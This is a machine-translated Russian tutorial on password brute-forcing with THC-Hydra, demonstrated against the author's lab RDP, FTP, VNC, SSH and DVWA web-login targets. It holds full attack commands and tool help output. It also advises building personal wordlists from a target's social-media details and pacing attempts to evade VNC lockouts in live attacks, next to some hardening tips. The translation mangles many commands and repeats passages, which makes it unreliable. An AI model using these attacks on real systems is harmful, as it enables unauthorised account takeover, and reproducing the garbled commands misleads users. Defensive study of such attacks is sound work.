Перебор паролей с помощью THC-Hydra

  1. Что такое ТГК-Гидра? Hydra - это очень быстрый онлайн-инструмент для взлома паролей, который может...
  2. Hydra-GTK
  3. Файл справки THC-Hydra
  4. Грубая сила \ атака по словарю
  5. RDP
  6. FTP
  7. VNC
  8. SSH
  9. Вход на веб-страницу

Что такое ТГК-Гидра?

Hydra - это очень быстрый онлайн-инструмент для взлома паролей, который может выполнять быстрые атаки по словарю против более чем 50 протоколов, включая Telnet, RDP, SSH, FTP, HTTP, HTTPS, SMB, несколько баз данных и многое другое. THC (Выбор Хакеров) создал Hydra для исследователей и консультантов по безопасности, чтобы показать, как легко получить удаленный несанкционированный доступ к системе.

Установка THC-Hydra

Если вы используете Kali Linux, у вас уже будет установлена ​​версия Hydra для всех других операционных систем Linux на основе Debian, загружаемых из репозитория с помощью.

sudo apt-get установить гидру

или вы можете скачать последнюю версию из общедоступного репозитория разработки GitHub от THC https://github.com/vanhauser-thc/thc-hydra

Начните с использования git для клонирования репозитория GitHub.

git clone https://github.com/vanhauser-thc/thc-hydra

Следующее изменение в каталоге thc-hydra.

cd thc-hydra

сейчас просто набери.

./configure

затем…

делать

а потом.

sudo сделать установку

Hydra-GTK

Hydra GTK - это графический интерфейс для гидры, так как это графический интерфейс для гидры, у вас должна быть уже установлена ​​THC-гидра. Если вы используете Kali Linux, он уже будет предварительно установлен для всех остальных, вы можете установить его, набрав.

sudo apt-get установить hydra-gtk

После установки у вас будет новое приложение под названием xHydra, откройте его, и вы должны увидеть окно, которое выглядит следующим образом.

Чтобы ознакомиться с последней информацией о проекте Hydra-GTK на их странице GitHub https://github.com/vanhauser-thc/thc-hydra/tree/master/hydra-gtk

Если вы уже загрузили Hydra из репозитория THC GitHub, вы также загрузите последнюю версию Hydra-GTK.

В папке thc-hydra, которую вы скачали с THC GitHub ранее, вы должны увидеть папку под названием hydra-gtx

CD Hydra-GTK /

Прежде чем я смог скомпилировать исходный код, мне нужно было установить зависимость gtk2.0

sudo apt-get установить gtk2.0

После установки я смог скомпилировать исходный код как обычно.

./configure make sudo make install

Файл справки THC-Hydra

После того, как вы установили Hydra, вы можете проверить его файл справки, набрав hydra -h .

hydra -h Hydra v8.6-dev (c) 2017 by van Hauser / THC - Пожалуйста, не используйте в военных или спецслужбах, а также в незаконных целях. Синтаксис: hydra [[[-l LOGIN | -L FILE] [-p PASS | -P FILE]] | [-C ФАЙЛ]] [-e nsr] [-o ФАЙЛ] [-t ЗАДАЧИ] [-M ФАЙЛ [-T ЗАДАЧИ]] [-w ВРЕМЯ] [-W ВРЕМЯ] [-f] [-s ПОРТ] [-x MIN: MAX: CHARSET] [-ISOuvVd46] [service: // server [: PORT] [/ OPT]] Опции: -R восстановить предыдущий прерванный / сбойный сеанс -Я игнорирую существующий файл восстановления (не ждите 10 секунд) -S выполнить SSL-соединение -S PORT, если служба находится на другом порте по умолчанию, определите его здесь -l ВХОД или -L ФАЙЛ для входа с именем ВХОДА или загрузите несколько входов из FILE -p PASS или -P FILE try пароль PASS или загрузить несколько паролей из FILE -x MIN: MAX: CHARSET генерация паролей bruteforce, введите «-x -h» для получения справки -y отключить использование символов в bruteforce, см. выше -e nsr try «n» нулевой пароль , "s" вход в систему как проход и / или "r" обратный вход в систему -u цикл вокруг пользователей, а не паролей (действует! подразумевается с -x) -C ФАЙЛ, разделенный двоеточием, формат "login: pass" вместо -L / -P опции -M FILE список серверов для атаки, одна запись в строке, ':' для указания порта -o FILE записывать найденные пары логин / пароль в FILE вместо stdout -b ФОРМАТ указать формат для -o ФАЙЛА: текст (по умолчанию), json, jsonv1 -f / -F выход при обнаружении пары логин / пароль (-M: -f для хоста, -F global) -t ЗАДАЧИ выполнить TASKS количество параллельных подключений для каждой цели (по умолчанию: 16) -T TASKS выполнить TASKS параллельных подключений в целом (для -M, по умолчанию: 64) -w / -W TIME время ожидания ответов (32) / между подключениями в потоке ( 0) -4 / -6 использовать адреса IPv4 (по умолчанию) / IPv6 (ставить всегда в [] также в -M) -v / -V / -d подробный режим / show login + pass для каждой попытки / режима отладки -O использовать старые SSL v2 и v3 -q не печатают сообщения об ошибках соединения. -U подробности об использовании сервисного модуля: сервер-получатель: DNS, IP или 192.168.0.0/24 (это ИЛИ опция -M), чтобы взломать сервис (см. ниже для поддерживаемые протоколы) OPT некоторые сервисные модули поддерживают дополнительный ввод (-U для справки модуля) Поддерживаемые сервисы: adam6500 звездочка cisco cisco-enable cvs ftp ftps http [s] - {head | get | post} http [s] - {get | post } -form http-proxy http-proxy-urlenum icq imap [s] irc ldap2 [s] ldap3 [- {cram | digest} md5] [s] mssql mysql (v4) nntp слушатель оракула oracle-sid pcanyfs pop3 [s] rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp [s] smtp-en snmp socks5 teampeak telnet [s] vmauthd vnc xmpp Hydra - это инструмент для угадывания / взлома действительных пар логин / пароль. Лицензировано под AGPL v3.0. Новейшая версия всегда доступна по адресу http://www.thc.org/thc-hydra. Не используйте в военных или спецслужбах или в незаконных целях. Эти сервисы не были скомпилированы в: postgres sapr3 firebird afp ncp ssh sshkey svn oracle mysql5 и поддержка регулярных выражений. Используйте переменные окружения HYDRA_PROXY_HTTP или HYDRA_PROXY для настройки прокси. Например,% export HYDRA_PROXY = socks5: // l: [электронная почта защищена] : 9150 (или: socks4: // connect: //)% export HYDRA_PROXY = connect_and_socks_proxylist.txt (до 64 записей)% export HYDRA_PROXY_HTTP = http: // login: [электронная почта защищена] : 8080% экспорт HYDRA_PROXY_HTTP = proxylist.txt (до 64 записей) Примеры: гидра -l пользователь -P passlist.txt ftp://192.168.0.1 гидра -L userlist.txt -p defaultpw imap: //192.168.0.1/ PLAIN hydra -C defaults.txt -6 pop3s: // [2001: db8 :: 1]: 143 / TLS: DIGEST-MD5-гидра -l пароль администратора -p ftp: // [192.168.0.0/24] / гидра - L logins.txt -P pws.txt -M target.txt ssh

Грубая сила \ атака по словарю

Гидра может использовать либо словарную атаку, где вы даете Гидре явный список слов, чтобы попробовать, либо грубую силу, которая пробует каждую возможную комбинацию букв, каждая из которых имеет свои преимущества и недостатки.

Dictionary Attack будет использовать предварительно скомпилированный список слов или список слов, это ускорит процесс взлома по грубой силе, потому что программа будет проходить только через каждое слово в списке слов, но если слово отсутствует в указанном списке слов, ваша атака провалится.

Если вы работаете с Kali, у вас уже будет целая куча списков слов, которые вы можете использовать, просто наберите loclist в терминале, чтобы найти их местоположение.

Для всех, кто не работает с Kali, вы можете скачать несколько хороших списков слов с SkullSecurity.org пароль вики, поищите rockyou.txt, так как это то, что я буду использовать в моих примерах ниже.

Если бы это была целевая атака на кого-то, вы могли бы использовать что-то вроде CUPP (Профилировщик общих паролей пользователей) создать список слов, более конкретный для цели. Требуется день рождения, псевдоним, адрес, имя питомца и т. Д. Введите сведения, которые вы знаете, или то, что вы можете узнать через социальные сети, и он создаст список слов на основе ваших входных данных.

Brute Force взломает пароль, попробовав каждую возможную комбинацию пароля, поэтому, например, он попробует aaaa, затем aaab, aaac, aaae. Это значительно увеличивает время, необходимое для атаки, но снижает вероятность неудачи атаки.

В гидре вы можете использовать -x, чтобы включить параметры грубой силы. Параметры грубой силы имеют собственный файл справки, который вы можете получить, набрав hydra -x -h .

hydra -x -h Hydra v8.6-dev (c) 2017 by van Hauser / THC - Пожалуйста, не используйте в военных или спецслужбах, а также в незаконных целях. Использование опции генерации пароля Hydra bruteforce: -x MIN: MAX: CHARSET MIN - минимальное количество символов в пароле. MAX - максимальное количество символов в пароле. CHARSET - это спецификация символов для использования в генерации. Допустимые значения CHARSET: : «a» для строчных букв, «A» для прописных букв, «1» для чисел и для всех остальных, просто добавьте их реальное представление. -y отключить использование указанных выше букв в качестве заполнителей. Примеры: -x 3: 5: a генерировать пароли длиной от 3 до 5 со всеми строчными буквами -x 5: 8: A1 генерирует пароли длиной от 5 до 8 с прописными буквами и цифрами - x 1: 3: / сгенерировать пароли длиной от 1 до 3, содержащие только косые черты -x 5: 5: /%,.- сгенерировать пароли с длиной 5, состоящей только из /%,.- -x 3: 5: aA1 -y генерировать пароли длиной от 3 до 5 только с a, A и 1 Режим брутфорса был сделан Jan Dlabal, http://houbysoft.com/bfg/

RDP

Для установки сцены у меня есть сервер Windows 2012 с настройкой удаленного рабочего стола, работающий в моей виртуальной лаборатории. Виртуальная машина имеет IP-адрес 192.168.34.16 и одного пользователя, называемого администратором.

Итак, давайте запустим гидру с помощью нашего списка слов и запустим эту команду

гидра -t 4 -V -f -l администратор -P rockyou.txt rdp: //192.168.34.16

-t 4 Это устанавливает количество задач, которые могут выполняться параллельно в этом примере. Я использовал 4, которые будут отправлять 4 входа одновременно. RDP не любит слишком много соединений одновременно, поэтому старайтесь поддерживать его максимум 4. Иногда стоит добавить -w к вашей команде, чтобы добавить ожидание между попытками.
-V - Подробно это показывает, какие имена пользователей и пароли на экране, как он работает.
-f Выход, как только вы нашли положительное совпадение имени пользователя и пароля.
-l администратор - используйте имя администратора для попытки входа в систему.
-P rockyou.txt - это список слов, из которого мы будем извлекать пароли.
rdp: //192.168.34.16 - это служба, которую мы хотим атаковать, и IP-адрес.

Вы должны видеть каждую попытку, когда она пытается подключиться к RDP, как показано ниже, так как мы использовали команду -f, гидра остановится, как только найдет положительное совпадение.

В средстве просмотра событий на сервере Windows 2012 с включенным протоколом RDP вы увидите множество событий с кодом 4625 в журналах безопасности. Как вы можете видеть ниже, это дает много информации системному администратору, откуда взялась грубая сила.

Если вы являетесь администратором сервера, для которого RDP получает перебор, вы можете смягчить это, изменив порт RDP по умолчанию, который прослушивает RDP, или если у вас есть маршрутизатор, который позволяет транспонировать порты, это, вероятно, лучший вариант.

Если вы заинтересованы в изменении порта, который прослушивает RDP на ПК с Windows, запустите редактор реестра (Regedit).

Затем найдите следующий раздел реестра:

HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Control \ Терминальный сервер \ WinStations \ RDP-TCP \ PortNumber

В меню E dit нажмите « Изменить» , а затем нажмите « Десятичное число».

Введите новый номер порта и нажмите кнопку ОК

Закройте редактор реестра.

Затем перезагрузите компьютер.

После перезагрузки компьютера вы сможете подключиться к нему с помощью подключения к удаленному рабочему столу, как обычно, но теперь вам нужно добавить двоеточие (:), а затем новый порт в конце адреса, как показано ниже.

Другой вариант - ограничить доступ RDP, сообщая брандмауэру Windows, какие IP-адреса разрешено подключать к порту RDP, а какие нет. Я уже сделал учебник по этой проверке, что из Вот

FTP

Используя тот же сервер Windows 2012, который я использовал для перебора RDP, я установил последнюю версию FileZilla Server, которую можно загрузить с их веб-сайта. https://filezilla-project.org /

Я не собираюсь вдаваться в тонкости настройки сервера FileZilla, для этого есть множество руководств, просто зайдите на него, просто знайте, что я настроил этот FTP-сервер для одного пользователя с именем admin с паролем [электронная почта защищена]

Затем я запускаю эту команду гидры в терминале, обратите внимание, что я использовал заглавную -L в этой команде. Это определяет список слов, который содержит список имен пользователей. используйте строчную букву l, если вы хотите указать одно имя пользователя.

hydra -t 5 -V -f -L список пользователей -P список паролей ftp://192.168.34.16

-t 5 устанавливает количество задач или логинов, которые он будет пытаться одновременно. Я пошел на 5 здесь, но только помните, не поднимайтесь слишком высоко, поскольку это может дать вам ложные результаты.
-V Подробно это будет отображать логин и пароль, которые он пытается в терминале для каждой попытки /
-f Завершает работу после того, как гидра обнаружит положительное совпадение имени пользователя и пароля.
-L userlist Заглавная -L здесь означает, что я использую список слов с именами пользователей, называемый userlist, если -l использовался, это указывает одно имя пользователя, которое нужно попробовать.
-P passwordlist Здесь заглавная -P означает, что я использую список слов под названием passwordlist, если используется -p, это указывает один пароль, который нужно попробовать.
ftp://192.168.34.16 Это служба, которую мы хотим атаковать, и IP-адрес FTP-сервера.

Вы будете видеть каждую попытку, так как она будет пытаться использовать все указанные комбинации имени пользователя и пароля, пока не будет найдено совпадение или совпадение или не закончится комбинация.

Вы будете видеть каждую попытку, так как она будет пытаться использовать все указанные комбинации имени пользователя и пароля, пока не будет найдено совпадение или совпадение или не закончится комбинация

Как вы можете видеть ниже, каждая попытка регистрируется в консоли FileZilla, вы также можете видеть все 5 задач входа в систему, одновременно запущенных внизу.

Как вы можете видеть ниже, каждая попытка регистрируется в консоли FileZilla, вы также можете видеть все 5 задач входа в систему, одновременно запущенных внизу

,

В FileZilla вы можете включить автоматический запрет, чтобы остановить взломщика, взломавшего имя пользователя и пароль FTP. Если этот параметр включен, он блокирует IP-адрес, с которого хакер использует для входа в систему после указанного количества неудачных входов в систему, по умолчанию установлено значение 10.

Интересно, что Hydra просто продолжала пробовать пароли, хотя мой IP был забанен, он прошел весь список имен пользователей и паролей и ничего не сказал в списке, хотя я знаю, что имя пользователя и пароль были в этом списке.

VNC

Я установил VNC-сервер на Linux mint box на 192.168.100.155, работающем в моей виртуальной лаборатории, а затем добавил пароль [электронная почта защищена] к серверу VNC, у меня есть краткий обзор того, как настроить это в Mint ниже.

apt-get установить vnc4server vncpasswd Пароль: [электронная почта защищена] Убедитесь, что: [электронная почта защищена] Vncserver

В прошлом VNC была очень небезопасной программой из-за отсутствия имени для входа в систему и возможности установки любого пароля, и она не должна отвечать никаким требованиям сложности, которые, как говорится в новых версиях, добавили функцию черного списка, которая блокирует вас. после 5 неудачных попыток входа в систему.

Поэтому, чтобы наша грубая сила сработала, мне пришлось отключить функцию внесения в черный список, выполнив эту команду в окне Linux Mint.

vncconfig -display: 1 -set BlacklistTimeout = 0 -set BlacklistThreshold = 1000000

Это помешает мне занести себя в черный список в моей тестовой лаборатории, при живом сражении я бы предложил увеличить время ожидания на попытку в гидре (-W) до 60 с лишним, и если вы атакуете старую версию VNC, эта функция черного списка не включен по умолчанию.

Также в качестве небольшого примечания не используйте более 4 задач (-t 4) в вашей команде, так как вы можете обнаружить, что она дает вам несколько ложных отрицаний, и помните, что в VNC-соединениях нет имени пользователя, поэтому нам не нужен ключ -l в нашей команде.

После того, как вы отключили функцию внесения в черный список, запустите эту команду в Hydra.

Гидра -P список паролей -t 1 -w 5 -f -s 5901 192.168.100.155 vnc -v

-P passwordlist Здесь заглавная -P означает, что я использую список слов под названием passwordlist, если используется -p, это указывает один пароль, который нужно попробовать.
-t 1 Устанавливает количество задач или логинов, которые он будет пытаться одновременно. Я пошел на 1 здесь, но только помните, не превышайте 4 для грубого принуждения VNC.
-w 5 Устанавливает время ожидания между попытками, которые я здесь выполнил для 5, но не забудьте подняться намного выше, если функция черного списка все еще включена
-f Выход, как только гидра нашла положительный пароль.
-s 5901 Это изменяет порт по умолчанию для подключения hydra к серверу VNC с 5900 до 5901, что было по умолчанию моим сервером VNC.
192.168.100.155 vnc Указывает IP-адрес сервера VNC и службы, которую мы хотим атаковать.
-v Подробно, это будет отображать пароль, который он пытается в терминале для каждой попытки.

После запуска команды вы должны увидеть вывод, подобный этому.

Как я уже говорил выше, пароли VNC заметно слабые. Вы никогда не должны запускать VNC-сервер напрямую через Интернет. Функция тайм-аута в черном списке предотвращает грубое взлом паролей, но если вы попадаете на сервер достаточно медленно, чтобы не попасть в черный список, он все равно может быть форсирован.

Вместо этого вы должны запустить VNC-сервер на 127.0.0.1, добавив -localhost в командную строку:

vncserver -localhost

затем используйте SSH туннелирование, чтобы связать порт на вашей машине с портом на сервере.

SSH-L 5901: локальный: 5901 [электронная почта защищена] <ServerIP>

Затем, когда это SSH-соединение работает, вы можете подключить свой VNC-клиент к порту 5901 на вашем компьютере.

Если вы хотите получить больше информации о SSH-туннелировании, ознакомьтесь с моим руководством по SSH. Вот

Непосредственно перед тем, как я закончу с грубым принуждением VNC, вы можете найти журналы VNC в скрытой папке .vnc в вашей домашней папке. Содержимое этого журнала будет выглядеть примерно так, как показано ниже в пунктах 1 и 2: вы можете увидеть, как гидра пытается ввести неправильный пароль, а в пункте 3: пароль был верным, интересно, что он не дает IP-адрес компьютера. Я использую грубую силу.

1:

SConnection: клиенту нужна версия протокола 3.7 SConnection: клиент запрашивает тип защиты VncAuth (2) SConnection: AuthFailureException: ошибка аутентификации Соединения: закрыто: 0.0.0.0::40744 (ошибка аутентификации) 2: соединения: принято: 0.0.0.0 :: 40746 SConnection: клиенту нужна версия протокола 3.7 SConnection: клиент запрашивает тип защиты VncAuth (2) SConnection: AuthFailureException: ошибка аутентификации Соединения: закрыто: 0.0.0.0::40746 (ошибка аутентификации) 3: соединения: принято: 0.0.0.0::40748 SConnection: клиенту нужна версия протокола 3.7 SConnection: клиент запрашивает тип защиты VncAuth (2) VNCSConnST: глубина пикселя по умолчанию для сервера 16 (16 бит / с) little-endian rgb565 Соединения: закрыто: 0.0.0.0::40748 (чистое отключение) SMsgWriter: обновления кадрового буфера 0 SMsgWriter: эквивалент необработанных байтов 0, степень сжатия -nan

SSH

Чтобы установить сцену, я установил Linux Mint в своей виртуальной лаборатории 192.168.100.155 с установленным SSH. В окне Linux Mint я создал пользователя с именем admin и паролем [электронная почта защищена]

Я уже сделал учебник по настройке Linux Mint в виртуальной коробке Вот

Также у меня есть руководство по установке SSH в Linux, ознакомьтесь с этим руководством Вот

Хорошо, теперь у нас есть виртуальная машина с SSH. мы можем использовать эту команду в Hydra, чтобы начать грубое форсирование входа в SSH.

Hydra -l admin -P список паролей ssh: //192.168.100.155 -V

-l admin Небольшое l здесь означает, что я собираюсь указать имя пользователя, используйте заглавную букву L, если вы собираетесь указать список пользователей.
-P список паролей Заглавная буква P здесь означает, что я собираюсь указать список паролей в файле с именем passwordlist.
ssh: //192.168.100.155 Это служба, которую мы хотим атаковать, и IP-адрес сервера SSH.
-V Подробно это будет отображать логин и пароль, которые он пытается в терминале для каждой попытки.

Как только вы запустите эту команду, вы должны увидеть все попытки в терминале, как показано ниже, обратите внимание, где я не добавил -t в команду, количество одновременных входов в систему будет 16, что по умолчанию.

Если вам интересно, SSH регистрирует попытки доступа в /var/log/auth.log

Чтобы сделать этот журнал немного проще для глаз, вы можете использовать команду хвоста Linux, чтобы отобразить последнее число строк в вашем файле auth.log.

Используйте следующую команду для просмотра 100 последних строк вашего журнала SSH.

tail -100 /var/log/auth.log | grep 'sshd'

Чтобы запретить кому-либо грубое принудительное использование вашего пароля SSH, вы можете полностью отключить аутентификацию по паролю и включить аутентификацию по ключу SSH. Если вы заинтересованы в настройке аутентификации по ключу SSH, ознакомьтесь с моим руководством SSH.

Вход на веб-страницу

Теперь, когда вещи начинают веселиться, вы можете использовать гидру, чтобы перебрать логины веб-страницы. Чтобы это сработало, вам нужно получить некоторую информацию о странице входа в систему, например, о публикации или запросе на получение, прежде чем вы сможете создать свою команду в Hydra.

Логин, который я собираюсь использовать, - это DVWA (чертовски уязвимое веб-приложение), которое, если вы уже посмотрели мое руководство по Настройка уязвимого сервера LAMP уже будет настроен и будет готов к работе.

Кроме того, вам понадобится установить какой-то прокси-сервер для сбора и определения ключевых параметров страницы входа в систему, чтобы мы могли создать нашу команду в Hydra. Я буду использовать плагин Firefox под названием Tamper Data, но вы также можете легко использовать Burp Suite.

Плагин Tamper Data Firefox можно загрузить с https://addons.mozilla.org/en-GB/firefox/addon/tamper-data/

————— Редактировать: 24 января 2019 года ———————

Данные тампера больше не работают с последней версией Firefox, ознакомьтесь с моим новым руководством Веб-входы с помощью грубой силы с DVWA для того же учебника ниже, но с использованием Burp Suite для захвата запросов.

--------------------------

Итак, для начала откройте веб-сайт DVWA в браузере «в моей лаборатории я захожу на http://192.168.100.155/dvwa» и войдите на сайт DVWA с учетными данными по умолчанию admin / password

Вы можете грубо заставить эту главную страницу входа в систему, но она немного более продвинута, чем то, что я хочу получить здесь Вы можете грубо заставить эту главную страницу входа в систему, но она немного более продвинута, чем то, что я хочу получить здесь.

После входа перейдите к кнопке DVWA Security в левой части страницы и убедитесь, что уровень безопасности установлен на низком уровне.

После входа перейдите к кнопке DVWA Security в левой части страницы и убедитесь, что уровень безопасности установлен на низком уровне

Как только уровень безопасности будет установлен на низком уровне, нажмите кнопку «Грубая сила» в меню слева.

Как только уровень безопасности будет установлен на низком уровне, нажмите кнопку «Грубая сила» в меню слева

Это страница входа, которую мы собираемся перебрать.

Начните с запуска Tamper Data, обычно я делаю это в Firefox, нажимая клавишу alt на клавиатуре и выбирая ее из меню Tools.

Теперь Tamper Data открыт, нажмите Start Tamper, и он проксирует весь ваш трафик Firefox через Tamper Data, позволяя нам захватить запрос на вход.

Теперь вернитесь в DVWA и введите любое старое имя пользователя и пароль и нажмите «Войти». Данные несанкционированного доступа захватят запрос на вход в систему и спросят вас, хотите ли вы подделать его, просто нажмите «Отправить».

Вернитесь к Tamper Data и щелкните правой кнопкой мыши первый полученный запрос GET и нажмите «Копировать».

Затем, откройте любой текстовый редактор и вставьте все, что мы скопировали из Tamper Data, это должно выглядеть примерно так

Теперь нам нужно только принять к сведению сообщение о том, что веб-сайт DVWA выдает нам сообщение о том, что мы ввели неверное имя пользователя и пароль.

Теперь у нас есть все, чтобы построить нашу команду hydra на этой странице входа.

Команда должна выглядеть примерно так: обратите внимание, что вся эта информация была получена из данных тампера, и единственная часть, которая будет отличаться от вашей, это часть после PHPSESSID =.

гидра 192.168.100.155 -V -l admin -P список паролей http-get-form "/ dvwa / уязвимости / перебор /: имя пользователя = ^ ПОЛЬЗОВАТЕЛЬ ^ & пароль = ^ PASS ^ & Логин = Логин: F = Неверное имя пользователя и / или пароль .: H = Cookie: PHPSESSID = rjevaetqb3dqbj1ph3nmjchel2; безопасность = низкая "

192.168.100.155 Целевой IP-адрес сервера, на котором размещена веб-страница
-V Подробно это будет отображать логин и пароль, которые он пытается в терминале для каждой попытки.
-l admin Небольшое l здесь означает, что я собираюсь указать имя пользователя, используйте заглавную букву L, если вы собираетесь указать список пользователей.
-P список паролей Заглавная буква P здесь означает, что я собираюсь указать список паролей в файле с именем passwordlist.
http-get-form Сообщает гидре, что вы собираетесь использовать модуль http-get-form.
/ dvwa / уязвимости / brute /: имя пользователя = ^ ПОЛЬЗОВАТЕЛЬ ^ & пароль = ^ PASS ^ & Login = Login Все эти детали были найдены в нашем запросе данных взлома, который мы скопировали в наш текстовый редактор.
F = имя пользователя и / или пароль неверны. Это сообщение о неудачном входе в систему, полученное нами со страницы входа в DVWA, сообщает гидре, когда оно не получено, у нас есть действительный вход в систему.
H = Cookie: PHPSESSID = rjevaetqb3dqbj1ph3nmjchel2; security = low Это Cookie, который мы выпустили, когда мы вошли на сайт DVWA при запуске, также найденном в Tamper Data.

H = Cookie: PHPSESSID = rjevaetqb3dqbj1ph3nmjchel2;  security = low Это Cookie, который мы выпустили, когда мы вошли на сайт DVWA при запуске, также найденном в Tamper Data

Если вы получаете сообщение об ошибке, как показано на рисунке ниже, где оно дает вам более одного действительного пароля. Это означает, что вы неправильно сконструировали команду и, возможно, вам просто нужно проверить правильность синтаксиса.

Обычно это либо неверный PHPSESSID, либо сообщение о неудачном входе в систему неправильно отформатировано.

Если вам нужна дополнительная информация о команде http-get-form в hydra, посмотрите страницу справки http-get-form в Hydra, набрав в своем терминале hydra http-get-form -U .

Справка по модулю http-get-form: ========================================= =================================== Модуль http-get-form требует страницу и параметры для Интернета форма. По умолчанию этот модуль настроен на выполнение не более 5 перенаправлений подряд. Он всегда собирает новый файл cookie с одного и того же URL-адреса без переменных. Параметры принимают три значения «:» плюс необязательные значения. (Примечание: если вам нужно использовать двоеточие в строке параметра в качестве значения, экранируйте его с помощью «\:», но не экранируйте «\» с помощью «\\».) Синтаксис: <url>: <параметры формы>: < строка условия> [: <необязательный> [: <необязательный>] Во-первых, это страница на сервере для GET или POST для (URL). Во-вторых, переменные POST / GET (взятые из браузера, прокси-сервера и т. Д. С заменой имен пользователей и паролей в заполнителях «^ USER ^» и «^ PASS ^» (ПАРАМЕТРЫ ФОРМАТА). В-третьих, это строка, которую он проверяет. * неверный * логин (по умолчанию) Недопустимой проверке входа в систему условия может предшествовать "F =", успешной проверке входа в систему условия должна предшествовать "S =". Это - то, где большинство людей ошибается. Вы должны проверить веб-приложение как выглядит неуспешная строка и помещает ее в этот параметр! Следующие параметры являются необязательными: C = / page / uri для определения другой страницы для сбора исходных файлов cookie из (h | H) = My-Hdr \: foo для отправки Пользовательский HTTP-заголовок с каждым запросом ^ USER ^ и ^ PASS ^ также может быть помещен в эти заголовки! Примечание: 'h' добавит пользовательский заголовок в конце независимо от того, отправляется ли он Hydra или нет. 'H' заменит значение этого заголовка, если оно существует, значением, предоставленным пользователем, или добавит заголовок в конце. Обратите внимание, что если вы собираетесь ставить двоеточия (:) в заголовках вы должны избегать их с обратной косой чертой (\). Все двоеточия, которые не являются разделителями опций, должны быть экранированы (см. Примеры выше и ниже). Вы можете указать заголовок без экранирования двоеточий, но таким образом вы не сможете поместить двоеточия в само значение заголовка, так как они будут интерпретироваться гидрой как разделители опций. Примеры: "/login.php:user=^USER^&pass=^PASS^:incorrect" "/login.php:user=^USER^&pass=^PASS^&colon=colon\:escape:S=authlog=.* success "" /login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed "" /: пользователь = ^ ПОЛЬЗОВАТЕЛЬ & pass = ^ PASS ^: не удалось: H = авторизация \: базовая dT1w: H = Cookie \: sessid = aaaa: h = X-пользователь \: ^ USER ^ "" /exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F <target>% 2Fexchange & flags = 0 & username = < домен>% 5C ^ USER ^ & Password = ^ PASS ^ & SubmitCreds = X & доверенный = 0: причина =: C = / Exchweb»

Это все, что я сейчас собираюсь сделать, перебирая пароли с помощью THC-Hydra. Если есть еще что-то, что вы хотели бы, чтобы я вам показал, или у вас есть обратная связь для меня, пожалуйста, оставьте комментарий ниже.

Что такое ТГК-Гидра?